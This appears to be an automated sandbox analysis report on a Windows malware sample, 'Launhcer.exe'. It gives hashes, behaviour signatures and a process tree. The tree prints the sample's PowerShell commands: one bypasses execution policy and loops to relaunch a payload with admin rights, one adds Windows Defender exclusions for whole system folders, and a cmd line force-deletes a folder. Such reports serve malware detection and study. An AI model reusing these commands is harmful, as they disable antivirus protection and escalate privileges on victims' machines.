Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2024 15:04

General

  • Target

    data/appInfo/services/Launhcer.exe

  • Size

    364KB

  • MD5

    e5c00b0bc45281666afd14eef04252b2

  • SHA1

    3b6eecf8250e88169976a5f866d15c60ee66b758

  • SHA256

    542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

  • SHA512

    2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

  • SSDEEP

    6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe
    "C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
        "C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2348
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    eb858a7f5c893a103a100e9e73057b6e

    SHA1

    b782e85f258d0e65cc28d658a0c71ef4622a8b7f

    SHA256

    236ed5921613c2e4ea5b010e293b03c0c86e0b2f57df99e7817c8290dacb31f9

    SHA512

    df31aff01c54b5c35c6e658adc68e7aa02ffe90788976a1ed1ec283523be451534b337ca56db896630f949303c36b5ffa365a3b4c8d3913be937e3800926b3fd

  • C:\Users\Admin\AppData\Local\Temp\CabBD39.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarBD4C.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    8088640cac58f9c1a9e326ae58f30840

    SHA1

    27ca7b34d0489e70799eb38feeacb56a7b065f55

    SHA256

    0f21d6e4686512aabfe74a6e27d6a548a6a850194da103ace452455d16050f17

    SHA512

    cc6396768a5eca2e6dbf0c4b3bab6e1bfa07ca309728b24bfa8d06d1b04acdfb93e1f0a5dda56fd3a64cebab8638f7b8f90085e2bdcb361b100e836a95cabac9

  • memory/1960-0-0x0000000000140000-0x0000000000141000-memory.dmp

    Filesize

    4KB

  • memory/2172-38-0x0000000073491000-0x0000000073492000-memory.dmp

    Filesize

    4KB

  • memory/2172-41-0x0000000073490000-0x0000000073A3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2172-40-0x0000000073490000-0x0000000073A3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2172-39-0x0000000073490000-0x0000000073A3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2172-317-0x0000000073490000-0x0000000073A3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2172-319-0x0000000073490000-0x0000000073A3B000-memory.dmp

    Filesize

    5.7MB